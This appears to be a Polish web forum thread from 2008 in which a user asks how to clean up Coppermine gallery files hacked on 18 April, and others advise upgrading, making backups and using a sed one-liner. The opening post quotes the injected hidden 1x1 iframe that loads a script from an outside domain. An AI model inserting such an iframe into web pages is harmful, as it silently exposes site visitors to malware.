Zobacz pełną wersję : Coppermine hacked
Witam
18 kwietnia całkiem spora ilość galerii Coppermine została zhakowana. Objawia się to generalnie tym że zmienia atrybuty galerii co początkowo uniemożliwia wejście na nią (777 na 775), zmienia ustawienia i wygląd galerii, ale co gorsza - wpieprza w kod taką linijkę:
<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>
Podejrzewam że zabawa będzie polegać na usunięciu tego syfu ręcznie, większym problemem jest jednak namierzenie w których plikach konkretnie znajduje się ten kod. Rozpoznać to można dosyć łatwo - po otwarciu galerii w różnych miejscach, zazwyczaj w narożniku, znajduje się malutki kwadracik.
Miał ktoś już ten problem? Wie ktoś jak się tego pozbyć?
Misiaque
25-04-2008, 13:02
Myślę, że zabawa to będzie polegać na tym, by zamknąć furtkę którą się to stało ;)
Która miałeś wersję Coppermine? Całkiem niedawno ukazała się 1.4.18, która łata jakieś dziury.
1.4.5
O tej nowej wiem, problem jest taki że nowa wersja łata dziury i zabezpiecza przed ponownym hakowaniem, ale stary syf trzeba usunąć samemu.
Wyczyściłem plik index.php, ale nie pomogło, zaszyte jest to też w innych plikach, i w tym szkopuł. Na razie próbuję zassać Allias Find and Replace, ale może ktoś mnie uprzedzi i wie jak sobie z tym dziadostwem poradzić?
O, kolego, to ja widzę, że Ty się sam o to prosiłeś. Od publikacji 1.4.5 upłynęły dwa lata, wykryto mnóstwo błędów i wypuszczono wiele aktualizacji. Aktualizować trzeba na bieżąco.
Natomiast, teraz, to zamiast bawić się w takie wyszukiwanie i usuwanie, po prostu zaktualizuj do bieżącej wersji. Aktualizacja polega na nadgraniu prawie wszystkich plików i wywołaniu update.php, który aktualizuje strukturę bazy danych. Powinno pomóc.
Aha, nie zapomnij wykonać wcześniej backup bazy i plików.
EDIT: Procedura aktualizacji z wersji 1.4.x:
http://coppermine-gallery.net/demo/cpg14x/docs/index.htm#14
A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?
A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie ;)
A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?
Jak zrobisz zgodnie z procedurą, to nic się nie uszkodzi i ustawienia zostaną zachowane. A jeśli nawet, to przecież masz backup, który zrobisz tuż przed aktualizacją.
A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie ;)No, to masz nauczkę na przyszłość.
Backup to właśnie robię, obawiam się że przy szybkości mojego łącza potrwa to kilka ładnych godzin, i to jest największy ból tego wszystkiego.
No nic, mam nadzieję że plewienie chwastów odbędzie się w miarę bezboleśnie.
Pochwalę się jak będzie po wszystkim.
A co do nauczki - większość aplikacji przyzwyczaiła mnie do tego wygodnego wyskakującego raz na jakiś czas okienka: czy chcesz zainstalować aktualizację? I ot - cała historia :)
Dzięki Kolaj!
Peri Noid
25-04-2008, 14:28
Jeśli masz tam dostęp shell-owy (jakiś Unix/Linux/BSD) to możesz wspomóc się sed'em. Jeśli dodany napis jest zawsze taki sam, to możesz na drzewku z plikami zapuścić coś takiego:
find -type f -exec sed -i "s/<iframe src='http:\/\/ccfelomvhk.com\/d\l/adv542.php' width=1 height=1><\/iframe>//g'" '{}' \;
To powinno wyciąć wszystkie powtórzenia tego tekstu. Oczywiście, lepiej najpierw zrobic sobie backup ;-)
Ale po co robić takie hece, skoro i tak następnym krokiem powinien być update do aktualnej wersji, który, jak wcześniej wspomniałem, nadgrywa wszystkie pliki oprócz konfiguracyjnych i folderu albums, w którym leżą wyłącznie nasze kochane jpg-i?
No i tak:
ten syfek atakuje sprytnie i nieostrożnie - wszystko to co na widoku i to co używane.
Zrobiłem więc backup, zamieniłem wg opisu wszystko z wyjątkiem "albums", "config" i "anycontent".
Pierwszy zonk - mój layout poszedł w diabły. Pewno dlatego że używałem zmodyfikowanego "classic", a ten - jak wiadomo - został zamieniony na nową wersję. Jest to 100% logiczne, tak samo jak fakt że miałem prawo tego nie pamiętać - minęły w końcu 2 lata.
Wczytałem zatem stary zbackupowany "classic" w katalogu "themes", i oczywiście syfek znowu był. Na szczęście są tam tylko 2 pliki w których się zagnieżdża - "theme" i "template". Szybka edycja, wywalenie felernego kawałka kodu i śmiga.
Gdyby nie prędkość mojego łącza, powiedziałbym że nawet bezboleśnie!
Pozdrawiam
A zdobyte dzięki tej przygodzie doświadczenie - BEZCENNE! :)
I pamiętaj regularnie odwiedzać stronę Coppermine i nie zaniedbywać aktualizacji.
Pojawił się upgrade Coppermine do wersji 1.4.19. Oprócz drobnych poprawek, załatana jest także pewna luka w zabezpieczeniach, dlatego aktualizacja ma status mandatory.
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html